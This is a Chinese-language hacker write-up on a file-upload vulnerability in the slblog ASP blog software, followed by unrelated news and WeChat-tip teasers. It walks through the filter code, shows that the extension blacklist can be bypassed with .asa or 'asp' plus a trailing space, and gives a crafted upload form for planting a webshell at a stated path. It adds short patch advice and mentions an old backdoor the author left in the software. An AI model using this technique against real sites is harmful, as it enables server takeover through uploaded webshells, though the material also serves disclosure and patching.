作者:jackal 黑鹰程序简介: slblog(思玲blog), 某权威站点统计的第三大blog用户程序。 这个多用户Blog,刚发展起来的,更新很快,感觉像是oblog和mis *** log的结合体, 同时首创了Blog系统无限级分类和用户栏目的无限级分类,多功能在现编辑器。 但界面不是很美观,好在模板和程序分离,方便修改。 不过这个blog 程序中存在致命的漏洞,所有的版本包括官方站点都有此漏洞。 有点年头了.忽然想起来,就发布了吧.官方补上了漏洞-_-! 用的人也挺多的,不过以前留了个后门.很久了.好象还能用. 授人以渔,其实还是上传的漏洞.请耐心看完,开始: 刚拿到的时候还想看有没注入点,3M多,我懒,看了一下过滤(Slblog/Include/Slbcode.asp) --------------code--------------------- ’60 过滤字符串中的危险字符 function ReplaceBadChar(strChar) if strChar="" then ReplaceBadChar="" else ReplaceBadChar=replace(replace(replace(replace(replace(replace(replace(strChar,"’",""),"*",""),"?",""),"(",""),")",""),"〈",""),".","") end if end function ---------------------------------------- 够让人郁闷的.去掉了’ * ? ( ) 〈和.不想找是不是有人家没过滤的代码。 去看别的,从后台开始,一般人写后台比较宽松,因为我就是。汗~,觉得自己的密码足够强大,别人也进不来,还是因为我懒。 发文章那里有个很不错的在线编辑器,目的很明确,先找上传,漏洞也就出现了。嘿嘿。SLBlog\SLeditor\Upload.asp 我们来看一下.晕!只有一个"浏览"的按钮.看下提交到哪里? -------------------(1.jpg)------------------------- 〈form action="?act=save&sType=&TBlogID=0&sClass=" method="post" name="sform" enctype="multipart/form-data"〉 ------------------------------------------------- 缺3个函数,sType,可能是文件的类型,TBlogID为id,sClass可能为分类类别,我也不大清楚.想验证的话,自己抓个包.去看Upload.asp代码,看怎么过滤的. 〈!--#include FILE="inc/upfileClass.asp"--〉 无惧上传类,往后看: --------------------------------------------- sClass = Trim(Request.Querystring("sClass")) sType = Trim(Request.Querystring("sType")) TBlogID= Trim(Request.Querystring("TBlogID")) ---------------------------------------------- 这里接受3个变量.再往后看. sNoAllowExt = "asp|htm|html|shtml|dhtml|aspx|js|as|vbs|exe" 嘿嘿,有问题后,心情有点激动,再下面 ---------------------------------------------- if (Trim(Request.QueryString("act"))) = "save" then sBlogPath = TBlogID & "|" & DatePart("yyyy",now()) & "|" & DatePart("m",now()) Call actSave() else Call actList() end if ---------------------------------------------- act为save时,保存.去看看还有没验证的. ---------------------------------------------- Sub actSave() Set upfile = new upFileClass ’’建立上传对象 upfile.NoAllowExt=sNoAllowExt ’设置上传类型的黑名单 upfile.GetData (sNoAllowSize*1024) ’取得上传数据,限制更大上传10M ---------------------------------------------- 后面是保存文件的路径和名称,不看了.我的马能传上去就得了. 总结一下:要提交4个变量,/Upload.asp?act=save&TBlogID=1&sType=image&sClass=1 TBlogID生成文件的时候用,sType为文件类型,用过一次.别处好象没用. --------------------------------------- 〈% Select Case sType Case "flash" sAllowExt = "swf" end Select %〉 --------------------------------------- TBlogID生成的文件夹的时候用,空的时候默认为0. --------------------------------------- If TBlogID = "" Or Not Isnumeric(TBlogID) Then TBlogID=0 end if --------------------------------------- sClass没找到调用,不管拉.这么一看,好象3个变量都没什么用了. 上传的问题: 只是不能传asp,我们可以传asa,或者简单点直接在asp后加空格. 没了.真没了.有我也不看了!构造上传. ----------------------------------------- 〈form action="http://test.com/Blog/sleditor/Upload.asp?act=save&TBlogID=1&sType=image&sClass=1" method="post" name="form1" enctype="multipart/form-data"〉 〈input name="FileName" type="FILE" class="656c-48fe-f603-ca4c Class=" method="" size="30"〉 〈input type="submit" name="Submit" value="上传"〉 〈/form〉 ----------------------------------------- 改下路径,上传asp+空格,成功.看下源文件. ------------------(2.jpg)--------------------- 〈script language="javascript"〉parent.UploadSaved(’1/2005/11/2005112420545773499.asp ’);history.back()〈/script〉〈script language="javascript"〉parent.imgIsUse(’2005112420545773499.asp ’);history.back()〈/script〉 ------------------------------------------- 文件保存在UploadFile下.路径是这样的: blog/UploadFile/1/2005/11/2005112420545773499.asp 补洞吧.简单点.就是UploadFile文件夹不允许执行asp. 安全点的是打上补丁.过滤掉空格和"."有了就跳到死. 给个例子,只要文件和后缀的.个数不同就错误. ------------------------------------------- FileName = Lcase(FileName) If Instr(FileName,".") 〈〉 InstrRev(FileName,".") Then msg="文件名中含有多个“.”!\n\n请修改文件名后再上传--BY JACKAL" FoundErr=true ------------------------------------------- bye~~
众所周知,目前我们使用的一切智能电子产品,所呈现出来的数据不管是文字还是图片,语音视频都是由设备的数据储存端的二进制数据组成的。那么当我们删除了手机上的聊天记录之后,到底有没有彻底删除,无...
据最新消息报道31省区市新增8例境外输入病例,其中主要是在上海广东等地,因此在境外输入方面的措施还是做得比较好的,另外有消息报道青岛发现2例无症状感染者,这也让大家很疑惑这个无症状感染者是怎么来的,接...
本文导读目录: 1、同一个手机号可以注册两个微信吗? 2、一个手机号怎么注册两个微信号? 3、一个手机号绑定两个微信怎么回事 4、一个手机号注册了两个微信号,怎样解绑第二个微信号? 5...
央视网消息:1月30日0至24时,31个省(自治区、直辖市)和新疆生产建设兵团报告新增确诊病例1982例,新增重症病例157例,新增死亡病例43例(湖北省42例、黑龙江省1例),新增治愈出院病例47例...
每日好文 手机微信除开让我们产生各种各样信息内容和闲聊沟通交流的便捷外,也是许多人用于挣钱的专用工具,可是一般人都不容易太了解怎样用微信来赚钱,文中写給这些在乎的人。 微信公众平台。 这个是现阶段...
日前,中央网信办正式对外发布“通过云计算服务安全评估的云平台”名单。其中,由曙光承建的成都电子政务云平台(二期)与无锡城市云计算中心电子政务云平台,阿里云承建的阿里云电子政务云平台,华为软承建的...